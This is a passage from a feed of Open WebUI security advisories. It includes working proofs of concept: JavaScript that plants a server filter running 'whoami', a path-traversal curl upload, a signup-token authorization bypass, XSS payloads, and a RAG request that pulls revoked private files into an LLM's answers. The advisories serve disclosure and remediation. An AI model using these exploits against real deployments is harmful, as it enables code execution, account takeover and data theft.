document.addEventListener(\"DOMContentLoaded\", () =\u003e {\n        document.onclick = () =\u003e {\n          open(url);\n          filter_id = \"okok\"\n//Create a function/filter to write code\nfetch('http://localhost:3000/api/v1/functions/create', {\n  method: 'POST',\n  headers: {\n    'Content-Type': 'application/json'\n  },\n  body: JSON.stringify({\n    \"id\": filter_id,\n    \"name\": \"test2\",\n    \"meta\": {\"description\": \"test2\"},\n    \"content\": \"from pydantic import BaseModel, Field\\nfrom typing import Optional\\n\\n\\nclass Filter:\\n    class Valves(BaseModel):\\n        priority: int = Field(\\n            default=0, description=\\\"Priority level for the filter operations.\\\"\\n        )\\n        max_turns: int = Field(\\n            default=8, description=\\\"Maximum allowable conversation turns for a user.\\\"\\n        )\\n        pass\\n\\n    class UserValves(BaseModel):\\n        max_turns: int = Field(\\n            default=4, description=\\\"Maximum allowable conversation turns for a user.\\\"\\n        )\\n        pass\\n\\n    def __init__(self):\\n        # Indicates custom file handling logic. This flag helps disengage default routines in favor of custom\\n        # implementations, informing the WebUI to defer file-related operations to designated methods within this class.\\n        # Alternatively, you can remove the files directly from the body in from the inlet hook\\n        # self.file_handler = True\\n\\n        # Initialize 'valves' with specific configurations. Using 'Valves' instance helps encapsulate settings,\\n        # which ensures settings are managed cohesively and not confused with operational flags like 'file_handler'.\\n        self.valves = self.Valves()\\n        f = open(\\\"/tmp/whoami.txt\\\", \\\"w\\\")\\n        import subprocess\\n\\n        output = subprocess.getoutput(\\\"whoami\\\")\\n        f.write(output)\\n        f.close()\\n        pass\\n\\n    def inlet(self, body: dict, __user__: Optional[dict] = None) -\u003e dict:\\n        return body\\n\\n    def outlet(self, body: dict, __user__: Optional[dict] = None) -\u003e dict:\\n        return body\\n\"\n  }),\n  credentials: 'include' // This will send cookies from the origin\n})\n.then(response =\u003e response.json())\n.then(data =\u003e console.log(data))\n.catch((error) =\u003e console.error('Error:', error)); \n\n\n//Toggle the filter to execute code\nfetch(`http://localhost:3000/api/v1/functions/id/${filter_id}/toggle`, {\n  method: 'POST',\n  credentials: 'include' // This will send cookies from the origin\n})\n.then(response =\u003e response.json())\n.then(data =\u003e console.log(data))\n.catch((error) =\u003e console.error('Error:', error)); \n        }\n      });\n    \u003c/script\u003e\n  \u003c/body\u003e\n```\n\n### Issue 2: Failure to Invalidate Session on Logout (`GHSL-2024-175`)\n\nOpenwebui fails to invalidate and clear session cookies after logout. In fact, it seems to reuse the same session cookies. This allows an attacker who has access to previous session cookie details to login at a later point as long as the victim has not closed their browser.\n\nThis vulnerability is relevant to the above CORS issue because it no longer requires the user to be logged in to exploit. If the cookie had been properly invalidated/cleared, the CORS issue would only affect logged in users. \n\n#### Impact\n\nThis issue may increase the impact of primitives gained from other security issues.\n\n#### Remediation\n\nFor every session, new cookies should be generated. When a user logouts, the session cookies from the previous session should be invalidated and removed from the browser's storage.\n\n#### Resources\n[OWASP Recommendation On Sessions](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)\n\n## GitHub Security Advisories\n\nWe recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory).\n\n## Credit\n\nThese issues were discovered and reported by GHSL team member [@Kwstubbs (Kevin Stubbings)](https://github.com/Kwstubbs).\n\n## Contact\n\nYou can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2024-174` or `GHSL-2024-175` in any communication regarding these issues.\n\n## Disclosure Policy\n\nThis report is subject to a 90-day disclosure deadline, as described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-11T14:02:04.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.3,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-6xcp-7mpr-m7wm","https://github.com/advisories/GHSA-6xcp-7mpr-m7wm"],"source_kind":"github","identifiers":["GHSA-6xcp-7mpr-m7wm"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-11T15:00:09.598Z","updated_at":"2026-09-03T03:03:17.295Z","epss_percentage":null,"epss_percentile":null,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02eGNwLTdtcHItbTd3bc4ABWjs","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS02eGNwLTdtcHItbTd3bc4ABWjs","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.3.33","vulnerable_version_range":"\u003c 0.3.33"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS02eGNwLTdtcHItbTd3bc4ABWjs/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05cGdoLWo3NGctcWo2bc4ABWgY","url":"https://github.com/advisories/GHSA-9pgh-j74g-qj6m","title":"Open WebUI Vulnerable to Arbitrary File Upload and Path Traversal","description":"# **CONFIDENTIAL**\n\n# KL-CAN-2024-002\n\n## Vulnerability Details\n\n| # | Field | Value |\n|---|-------|-------|\n| 1 | **Discoverer** | Jaggar Henry \u0026 Sean Segreti of KoreLogic, Inc. |\n| 2 | **Date Submitted** | 2024.03.12 |\n| 3 | **Title** | Open WebUI Arbitrary File Upload + Path Traversal |\n| 5 | **Affected Vendor** | Open WebUI |\n| 6 | **Affected Product(s)** | Open WebUI (Formerly Ollama WebUI) |\n| 7 | **Affected Version(s)** | 0.1.105 |\n| 8 | **Platform/OS** | Debian GNU/Linux 12 (bookworm) |\n| 9 | **Vector** | HTTP web interface |\n| 10 | **CWE** | CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-434: Unrestricted Upload of File with Dangerous Type |\n\n---\n\n## 4. High-level Summary\n\nAttacker controlled files can be uploaded to arbitrary locations on the web server's filesystem by abusing a path traversal vulnerability.\n\n---\n\n## 11. Technical Analysis\n\nWhen attaching files to a prompt by clicking the plus sign (+) on the left of the message input box when using the Open WebUI HTTP interface, the file is uploaded to a static upload directory.\n\nThe name of the file is derived from the original HTTP upload request and is not validated or sanitized. This allows for users to upload files with names containing dot-segments in the file path and traverse out of the intended uploads directory. Effectively, users can upload files anywhere on the filesystem the user running the web server has permission.\n\nThis can be visualized by examining the python code for the `/rag/api/v1/doc` API route:\n\n```python\n@app.post(\"/doc\")\ndef store_doc(\n    collection_name: Optional[str] = Form(None),\n    file: UploadFile = File(...),\n    user=Depends(get_current_user),\n):\n    # \"https://www.gutenberg.org/files/1727/1727-h/1727-h.htm\"\n\n    print(file.content_type)\n    try:\n        filename = file.filename\n        file_path = f\"{UPLOAD_DIR}/{filename}\"\n        contents = file.file.read()\n        with open(file_path, \"wb\") as f:\n            f.write(contents)\n            f.close()\n```\n\nThe `file` variable is a representation of the multipart form data contained within the HTTP POST request. The `filename` variable is derived from the uploaded file name and is not validated before writing the file contents to disk.\n\nThis can be used to upload malicious models. These models are often distributed as pickled python objects and can be leveraged to execute arbitrary python bytecode once deserialized. Alternatively, an attacker can leverage existing services, such as SSH, to upload an attacker controlled `authorized_keys` file to remotely connect to the machine.\n\n---\n\n## 12. Proof-of-Concept\n\nExecute the following cURL command:\n\n```bash\nTARGET_URI='https://redacted.com'; JWT='redacted'; LOCAL_FILE='/tmp/file_to_upload.txt'\\\ncurl -H \"Authorization: Bearer $JWT\" -F \"file=$LOCAL_FILE;filename=../../../../../../../../../../tmp/pwned.txt\" \"$TARGET_URI/rag/api/v1/doc\"\n```\n\nVerify the file `pwned.txt` exists in the `/tmp/` directory on the machine hosting the web server:\n\n```console\nollama@webserver:~$ cat /tmp/pwned.txt \nkorelogic\nollama@webserver:~$\n```","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-08T22:38:09.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-9pgh-j74g-qj6m","https://nvd.nist.gov/vuln/detail/CVE-2026-44566","https://github.com/advisories/GHSA-9pgh-j74g-qj6m"],"source_kind":"github","identifiers":["GHSA-9pgh-j74g-qj6m","CVE-2026-44566"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-08T23:00:08.125Z","updated_at":"2026-09-03T03:03:18.747Z","epss_percentage":0.00336,"epss_percentile":0.26068,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05cGdoLWo3NGctcWo2bc4ABWgY","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05cGdoLWo3NGctcWo2bc4ABWgY","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.1.124","vulnerable_version_range":"\u003c= 0.1.123"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05cGdoLWo3NGctcWo2bc4ABWgY/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS00dmc1LXJwMjgtZ3ZqZs4ABWgX","url":"https://github.com/advisories/GHSA-4vg5-rp28-gvjf","title":"Open WebUI has Improper Authorization Control","description":"# **CONFIDENTIAL**\n\n# Vulnerability Disclosure Analysis Documentation\n\n---\n\n## Vulnerability Details\n\n| # | Field | Value |\n|---|-------|-------|\n| 1 | **Discoverer** | Taylor Pennington of KoreLogic, Inc. |\n| 2 | **Date Submitted** | June 11, 2024 |\n| 3 | **Title** | Open WebUI Improper Authorization Control |\n| 5 | **Affected Vendor** | Open WebUI |\n| 6 | **Affected Product(s)** | Open WebUI (Formerly Ollama WebUI) |\n| 7 | **Affected Version(s)** | 0.1.105 |\n| 8 | **Platform/OS** | Debian GNU/Linux 12 (bookworm) |\n| 9 | **Vector** | HTTP web interface |\n| 10 | **CWE** | 285 Improper Authorization |\n\n---\n\n## 4. High-level Summary\n\nThere is a missing authorization check affecting user accounts with a `pending` status allowing the user to make authenticated API calls as a `user` context.\n\n---\n\n## 11. Technical Analysis\n\nThe Open WebUI web application has three user role classifications: `user`, `admin`, and `pending`. By default, when Open WebUI is configured with `new sign-ups` enabled, the default user role is set to `pending`. In this configuration, an administrator is required to go into the Admin management panel following a new user registration and reconfigure the user to have a role of either `user` or `admin` before that user is able to access the web application. However, this check is only enforced at the client presentation layer, the API does not properly validate that the user has an authorized user role of `user`.\n\n### Request\n\n```http\nPOST /api/v1/auths/signup HTTP/1.1\nHost: openwebui.example.com\nContent-Length: 60\n\n{ \n \"name\": \"\", \n \"email\": \"bad_guy@korelogic.com\", \n \"password\": \"a\" \n }\n```\n\n### Response\n\n```http\nHTTP/1.1 200 OK\n...\n\n{\n\"id\": \"f839557a-031a-47a5-9999-0b0998f8f959\",\n\"email\": \"bad_guy@korelogic.com\",\n\"name\": \"\",\n\"role\": \"pending\",\n\"profile_image_url\": \"/user.png\",\n\"token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImY4Mzk1NTdhLTAzMWEtNDdhNS05OTk5LTBiMDk5OGY4Zjk1OSJ9.Bk-S4ABXb1tRuiVNfOJYbQFB8ewixWA4a1FohvIZARs\",\n\"token_type\": \"Bearer\"\n}\n```\n\nAn attacker can then use the JWT in the above response to make direct API calls or they can forge the authentication response and use the web UI.\n\nWith the JWT, an attacker can now query the LLM. However, for this demonstration we will query the `/ollama/api/tags` endpoint and get a list of available models as this is an authenticated endpoint. Attempting to make this request without a valid JWT returns an HTTP `401 Unauthorized` response.\n\n### Request\n\n```http\nGET /ollama/api/tags HTTP/1.1\nHost: openwebui.example.com\nAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImY4Mzk1NTdhLTAzMWEtNDdhNS05OTk5LTBiMDk5OGY4Zjk1OSJ9.Bk-S4ABXb1tRuiVNfOJYbQFB8ewixWA4a1FohvIZARs\n```\n\n### Response\n\n```http\nHTTP/1.1 200 OK\n...\n\n{\n\"models\": [\n    {\n    \"name\": \"ollama.com/emsi/mixtral-8x22b:latest\",\n    \"model\": \"ollama.com/emsi/mixtral-8x22b:latest\",\n    \"modified_at\": \"2024-04-12T17:27:51.479356401-04:00\",\n    \"size\": 79509285991,\n    \"digest\": \"9b000033acd802656a652c7df4e25300a61d903cd3c8eb065a50aaace484c319\",\n    \"details\": {\n        \"parent_model\": \"\",\n        \"format\": \"gguf\",\n        \"family\": \"llama\",\n        \"families\": [\"llama\"],\n        \"parameter_size\": \"141B\",\n        \"quantization_level\": \"Q4_0\"\n    },\n    \"urls\": [0]\n    },\n    ...\n]\n}\n```\n\nThe logic for this endpoint can be seen here:\n\u003chttps://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/apps/ollama/main.py#L163-L180\u003e\n\nAs shown below, the login checks if `url_idx` is `None` and if so, call `get_all_mdoels` and assign the result to `models` after that the logic checks if `app.state.MODEL_FILTER_ENABLED` is true and if not, it returns the result. As `MODEL_FILTER_ENABLED` is not configured by default, the application will not attempt to further validate the user.\n\n```python\n@app.get(\"/api/tags\")\n@app.get(\"/api/tags/{url_idx}\")\nasync def get_ollama_tags(\n    url_idx: Optional[int] = None, user=Depends(get_current_user)\n):\n    if url_idx == None:\n        models = await get_all_models()\n        \n        if app.state.MODEL_FILTER_ENABLED:\n            if user.role == \"user\":\n                models[\"models\"] = list(\n                    filter(\n                        lambda model: model[\"name\"] in app.state.MODEL_FILTER_LIST,\n                        models[\"models\"],\n                    )\n                )\n                return models\n        return models\n```\n\nThis is just an example of one API endpoint but all other regular user accessible endpoints were accessible to a pending user.\n\nThe vulnerability is caused by a missing authorization check that occurs with `user=Depends(get_current_user)`. The logic of that function is found here:\n\u003chttps://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/utils/utils.py#L77-L97\u003e\n\n```python\ndef get_current_user(\nauth_token: HTTPAuthorizationCredentials = Depends(bearer_security),\n):\n    # auth by api key\n    if auth_token.credentials.startswith(\"sk-\"):\n        return get_current_user_by_api_key(auth_token.credentials)\n    # auth by jwt token\n    data = decode_token(auth_token.credentials)\n    if data != None and \"id\" in data:\n        user = Users.get_user_by_id(data[\"id\"])\n        if user is None:\n            raise HTTPException(\n                status_code=status.HTTP_401_UNAUTHORIZED,\n                detail=ERROR_MESSAGES.INVALID_TOKEN,\n            )\n        return user\n    else:\n        raise HTTPException(\n            status_code=status.HTTP_401_UNAUTHORIZED,\n            detail=ERROR_MESSAGES.UNAUTHORIZED,\n        )\n```\n\nAs shown above, this logic does not verify the role of the user, the function simples checks if the JWT is valid.\n\n---\n\n## 12. Proof-of-Concept\n\nFirst, verify that an unauthenticated user receives `{\"detail\":\"401 Unauthorized\"}`:\n\n```bash\ncurl -s -X $'GET' \\\n    -H $'Host: openwebui.example.com' \\\n    -H $'Content-Type: application/json' \\\n    $'https://openwebui.example.com/ollama/api/tags'\n```\n\nThe above curl command will return: `{\"detail\":\"401 Unauthorized\"}` as no Authorization Bearer token is provided.\n\nNow to access the authentication endpoint, two calls will be made. The first cURL creates an account and sets the `$JWT` environment variable which will be utilized in the subsequent cURL command.\n\n```bash\nexport JWT=$(curl -s -X POST \\\n    -H 'Host: openwebui.example.com' -H 'Content-Length: 60' \\\n    -H 'Content-Type: application/json' \\\n    --data '{\"name\":\"\",\"email\":\"bad_guy@korelogic.com\",\"password\":\"a\"}' \\\n    'https://openwebui.example.com/api/v1/auths/signup' | jq '.token'|tr -d '\"')\n\ncurl -v $'GET' \\\n    -H $'Host: openwebui.example.com' \\\n    -H $'Content-Type: application/json' \\\n    -H $'Authorization: Bearer ${JWT}' -H $'Content-Length: 2' \\\n    --data-binary $'\\x0d\\x0a' \\\n    $'https://openwebui.example.com/ollama/api/tags'\n```\n\nAdditionally the `\"role\":\"pending\"` value in the HTTP response can be forged from `POST /api/v1/auths/signin` and `GET /api/v1/auths/` to utilize the full website. This can be achieved with a man-in-the-middle proxy such as Burp or Zap and modifying `pending` to `user`.\n\n---\n\n## 13. Mitigation Recommendation\n\nThe application currently has a function for checking if the user is authorized. However, it is not being utilized except for one endpoint. See \u003chttps://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/utils/utils.py#L110-L116\u003e for the correct function to use.\n\n```python\ndef get_verified_user(user=Depends(get_current_user)):\nif user.role not in {\"user\", \"admin\"}:\n    raise HTTPException(\n        status_code=status.HTTP_401_UNAUTHORIZED,\n        detail=ERROR_MESSAGES.ACCESS_PROHIBITED,\n    )\nreturn user\n```\n\nModify all authenticated endpoints to utilize `get_verified_user()` function instead of `get_current_user()`.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-08T22:34:12.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-4vg5-rp28-gvjf","https://nvd.nist.gov/vuln/detail/CVE-2026-44567","https://github.com/advisories/GHSA-4vg5-rp28-gvjf"],"source_kind":"github","identifiers":["GHSA-4vg5-rp28-gvjf","CVE-2026-44567"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-08T23:00:08.125Z","updated_at":"2026-09-03T03:03:18.748Z","epss_percentage":0.0023,"epss_percentile":0.13604,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00dmc1LXJwMjgtZ3ZqZs4ABWgX","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS00dmc1LXJwMjgtZ3ZqZs4ABWgX","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.1.124","vulnerable_version_range":"\u003c= 0.1.123"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00dmc1LXJwMjgtZ3ZqZs4ABWgX/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qd2Y4LXB2NXAtdmhtY84ABWgW","url":"https://github.com/advisories/GHSA-jwf8-pv5p-vhmc","title":"Open WebUI has stored XSS in Excel file preview","description":"### Summary\nExcel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the [sheetjs](https://git.sheetjs.com/sheetjs/sheetjs) function [sheet_to_html](https://git.sheetjs.com/sheetjs/sheetjs/src/commit/66cf8d2117d271f89e4f47b5fed35a3e1ea93f67/bits/79_html.js#L127) to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via [`@html`](https://svelte.dev/docs/svelte/@html) causing the payload to trigger.\n\n### Details\nThe function used to convert XLSX documents to HTML for preview does not perform any input validation or sanitisation for the generated HTML\nhttps://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L120-L133\nXLSX attachments are processed by this function, converted to HTML with `XLSX.utils.sheet_to_html` before ultimately being assigned to the variable `excelHtml`. Later there is logic that causes this to be assigned directly to the DOM when the preview tab is selected.\nhttps://github.com/open-webui/open-webui/blob/a7271532f8a38da46785afcaa7e65f9a45e7d753/src/lib/components/common/FileItemModal.svelte#L358-L400\n\n### PoC\nA python script to generate a payload file is as follows:\n```python\nimport xlsxwriter                                                                                                                \n                                                                                                                                 \npayload = '\u003cimg src=x onerror=\"alert(\\'XSS Triggered by XLSX file\\')\"\u003e'                                                          \n                                                                                                                             \nworkbook = xlsxwriter.Workbook('xss_payload.xlsx')                                                                           \nworksheet = workbook.add_worksheet()                                                                                         \n                                                                                                                             \npayload_format = workbook.add_format()                                                                                       \n                                                                                                                             \nworksheet.write_rich_string('A1',                                                                                            \n    'This cell contains a hidden payload: ',                                                                                 \n    payload_format, payload                                                                                                  \n)                                                                                                                            \n                                                                                                                             \nworksheet.write('A2', 'This is a safe cell.')                                                                                \nworksheet.write('B1', 'Column B')                                                                                            \n                                                                                                                             \nworkbook.close()\n```\n\nUpload the generated file as an attachment to a chat, open the file modal, and click preview. Observe the XSS triggers.\n\u003cimg width=\"2444\" height=\"1386\" alt=\"image\" src=\"https://github.com/user-attachments/assets/8400efb0-ea6f-4878-abdb-4c2fe529241f\" /\u003e\nThis same process can be triggered in shared chats, allowing the payload to be distributed to victims.\n\u003cimg width=\"2386\" height=\"1646\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d0eda49c-8fcf-4fc4-bbb0-c8951b0369c3\" /\u003e\n\n\n### Impact\nAny user can create a weaponised chat that can be shared and subsequently used to target other users.\n\nLow privilege users are at risk of having their session taken over by a payload that reads their token from local storage and exfiltrates it to an attacker controlled server.\n\nAdmins are at risk of exposing the server to RCE via same chain described in GHSA-w7xj-8fx7-wfch.\n\n### Caveats\nThe file attachment in the shared chat must be opened and previewed to trigger the vulnerability.\n\n### Recommendation\nSanitise the generated HTML with DOMPurify before assigning it to the DOM.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-05-08T22:26:17.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc","https://nvd.nist.gov/vuln/detail/CVE-2026-44549","https://github.com/advisories/GHSA-jwf8-pv5p-vhmc"],"source_kind":"github","identifiers":["GHSA-jwf8-pv5p-vhmc","CVE-2026-44549"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-08T23:00:08.125Z","updated_at":"2026-09-03T03:03:18.748Z","epss_percentage":0.00318,"epss_percentile":0.23993,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qd2Y4LXB2NXAtdmhtY84ABWgW","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qd2Y4LXB2NXAtdmhtY84ABWgW","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.8.0","vulnerable_version_range":"\u003c= 0.7.2"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qd2Y4LXB2NXAtdmhtY84ABWgW/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1mcTN2LXhqangtOTVyY84ABWgR","url":"https://github.com/advisories/GHSA-fq3v-xjjx-95rc","title":"Open WebUI has Stored XSS in Pending User Overlay via Incorrect DOMPurify Application Order","description":"## Vulnerability Details\n\n**CWE-79**: Cross-site Scripting (XSS)\n\nThe `AccountPending.svelte` component renders the admin-configured \"Pending User Overlay Content\" using `marked.parse()` inside `{@html}` with an incorrect DOMPurify application order:\n\n### Vulnerable Code\n\n**`src/lib/components/layout/Overlay/AccountPending.svelte` (lines 43-48)**:\n\n```svelte\n{@html marked.parse(\n    DOMPurify.sanitize(\n        ($config?.ui?.pending_user_overlay_content ?? '').replace(/\\n/g, '\u003cbr\u003e')\n    )\n)}\n```\n\nDOMPurify is applied to the raw Markdown input **before** `marked.parse()` processes it. This is the wrong order. DOMPurify sanitizes the Markdown text (which contains no HTML tags), then `marked.parse()` converts Markdown link syntax into HTML `\u003ca\u003e` tags with `javascript:` href, and the result is rendered with `{@html}` unsanitized.\n\nThe correct pattern (used elsewhere in the codebase, e.g., `NotebookView.svelte:77`) is:\n```javascript\nDOMPurify.sanitize(marked.parse(src))  // sanitize AFTER markdown parsing\n```\n\n## Steps to Reproduce\n\n### Prerequisites\n- Open WebUI v0.8.10\n- Admin account\n- A second user account with \"pending\" role\n\n### Steps\n\n1. Log in as admin and navigate to **Admin Settings** → **Settings** → **General**.\n\n2. Set **Default User Role** to `pending`.\n\n3. In the **Pending User Overlay Content** field, enter:\n```\n# Account Pending\n\nYour account is under review.\n\n[Contact Support](javascript:alert(document.domain))\n```\n\n4. Save the settings.\n\n5. In a separate browser (or incognito window), create a new account or log in as a pending user.\n\n6. The pending overlay is displayed. Click the \"Contact Support\" link.\n\n7. A JavaScript alert dialog appears showing `localhost` (the document domain), confirming XSS execution.\n\n### Verified Output\n\nThe `alert(document.domain)` executes successfully, displaying \"localhost\" in a JavaScript dialog box.\n\n## Impact\n\nAn admin can inject arbitrary JavaScript into the Pending User Overlay Content that executes in the browser context of any pending user who views the overlay page. This could be used to:\n\n- **Session hijacking**: Steal pending users' JWT tokens from cookies/localStorage\n- **Credential theft**: Replace the pending overlay with a fake login form\n- **Phishing**: Redirect pending users to malicious sites\n\nWhile this requires admin privileges to set the overlay content, it enables an admin to attack pending users (who have not yet been granted full access). In multi-admin deployments, a compromised admin account could use this to escalate attacks.\n\n## Proposed Fix\n\nApply DOMPurify **after** `marked.parse()`, not before:\n\n```svelte\n\u003c!-- Before (vulnerable): --\u003e\n{@html marked.parse(\n    DOMPurify.sanitize(\n        ($config?.ui?.pending_user_overlay_content ?? '').replace(/\\n/g, '\u003cbr\u003e')\n    )\n)}\n\n\u003c!-- After (fixed): --\u003e\n{@html DOMPurify.sanitize(\n    marked.parse(\n        ($config?.ui?.pending_user_overlay_content ?? '').replace(/\\n/g, '\u003cbr\u003e'),\n        { async: false }\n    )\n)}\n```\n\u003cimg width=\"1510\" height=\"1093\" alt=\"2026-03-23_03-07\" src=\"https://github.com/user-attachments/assets/bcc94dd6-4f06-472b-9979-9759458c76b3\" /\u003e","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-08T22:21:33.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N","references":["https://github.com/open-webui/open-webui/security/advisories/GHSA-fq3v-xjjx-95rc","https://nvd.nist.gov/vuln/detail/CVE-2026-44568","https://github.com/advisories/GHSA-fq3v-xjjx-95rc"],"source_kind":"github","identifiers":["GHSA-fq3v-xjjx-95rc","CVE-2026-44568"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-08T23:00:08.125Z","updated_at":"2026-09-03T03:03:18.749Z","epss_percentage":0.0017,"epss_percentile":0.06501,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mcTN2LXhqangtOTVyY84ABWgR","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1mcTN2LXhqangtOTVyY84ABWgR","packages":[{"ecosystem":"pypi","package_name":"open-webui","versions":[{"first_patched_version":"0.9.0","vulnerable_version_range":"\u003c= 0.8.12"}],"purl":"pkg:pypi/open-webui"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1mcTN2LXhqangtOTVyY84ABWgR/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oMzZmLXJxcHgtajV3eM4ABWf-","url":"https://github.com/advisories/GHSA-h36f-rqpx-j5wx","title":"Open WebUI has Unauthorized File and Knowledge Base Content Access via RAG Vector Search","description":"# Unauthorized File and Knowledge Base Content Access via RAG Vector Search\n\n## Affected Component\n\nRAG source resolution in chat completion pipeline:\n- `backend/open_webui/retrieval/utils.py` (lines 963-965, 1063-1068, 1126-1131 in `get_sources_from_items`)\n\n## Affected Versions\n\nCurrent main branch (commit `6fdd19bf1`) and likely all versions with RAG functionality.\n\n## Description\n\nThe `get_sources_from_items` function resolves file and knowledge base references into vector search queries during chat completion. Three of the five code paths perform vector store queries without any authorization check, allowing users to extract content from files and knowledge bases they do not have access to.\n\n| Path | Lines | Access Check |\n|------|-------|-------------|\n| `type: \"file\"`, full-context | 1044-1050 | ✅ `has_access_to_file` |\n| `type: \"file\"`, non-full-context (default) | 1063-1068 | ❌ None |\n| `type: \"collection\"` | 1070-1118 | ✅ Present |\n| `type: \"text\"` with `collection_name` | 963-965 | ❌ None |\n| Bare `collection_name`/`collection_names` | 1126-1131 | ❌ None |\n\nThe three unprotected paths pass user-supplied collection names directly to `query_collection()`, which queries the vector store without any authorization. Collection names follow predictable formats: `file-\u003cfile_id\u003e` for files and the knowledge base UUID for knowledge bases.\n\n## CVSS 3.1 Breakdown\n\n| Metric | Value | Rationale |\n|--------|-------|-----------|\n| Attack Vector | Network (N) | Exploited remotely via chat completion API |\n| Attack Complexity | Low (L) | Single API call with a known resource ID |\n| Privileges Required | Low (L) | Requires a valid user account |\n| User Interaction | None (N) | No victim interaction required |\n| Scope | Unchanged (U) | Impact within the application's data boundary |\n| Confidentiality | High (H) | Full content of private files/knowledge bases extractable |\n| Integrity | None (N) | No data modification |\n| Availability | None (N) | No denial of service |\n\n## Attack Scenario\n\n1. User A uploads a private document and uses it in RAG (the document is embedded into the vector store as collection `file-\u003cfile_id\u003e`).\n2. User A shares a chat or model referencing the file with User B, or User B otherwise obtains the file ID through a legitimate interaction.\n3. User A later revokes User B's access to the file.\n4. User B sends a chat completion request referencing the revoked file:\n   ```json\n   POST /api/chat/completions\n   {\n     \"model\": \"any-accessible-model\",\n     \"messages\": [{\"role\": \"user\", \"content\": \"What does this document say about pricing?\"}],\n     \"files\": [{\"type\": \"file\", \"id\": \"\u003crevoked_file_id\u003e\"}]\n   }\n   ```\n5. The non-full-context path (default) constructs collection name `file-\u003cid\u003e` and queries the vector store with no access check.\n6. Matching chunks are injected into the LLM context, and the response contains the victim's private file content.\n\nThe same attack works via `{\"type\": \"text\", \"collection_name\": \"\u003cknowledge_base_id\u003e\"}` for 